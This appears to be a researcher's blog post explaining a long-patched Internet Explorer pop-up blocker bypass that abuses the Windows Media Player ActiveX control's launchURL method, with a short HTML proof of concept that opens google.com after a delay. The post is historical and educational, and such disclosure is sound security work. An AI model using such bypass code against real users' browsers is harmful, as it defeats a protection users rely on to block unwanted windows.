Popup Bypass Using WMP

The Windows Media Player ActiveX control exposed a launchURL method that could open a new browser window without triggering the pop-up blocker. The method was intended to let the media player open web pages related to the playing content, but nothing prevented a web page from calling it directly with an arbitrary URL.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<TITLE> Yet Another popUp Blocker byPass </TITLE></HEAD>
<BODY>
This time, using the launchURL method from the WMP.
<!-- Windows Media Player -->
<OBJECT ID="theObj" CLASSID="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" WIDTH="1" HEIGHT="1"></OBJECT>
<SCRIPT LANGUAGE="JavaScript">
setTimeout('document.all.theObj.launchURL("http://www.google.com&&_top");',2000);
</SCRIPT>
</BODY>
</HTML>

The WMP control (CLSID 6BF52A52-394A-11d3-B153-00C04F79FAA6) trusts the URL it receives through launchURL and opens it in the browser. Because WMP was considered a trusted host component, the resulting navigation bypassed the pop-up blocker rules that would have blocked the same call from a plain script. The &&_top suffix was a quirk that helped ensure the window target resolved correctly.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE7 Resident - opener, createElement, OBJECT] :: [Kevin's XML Resident Script POC] >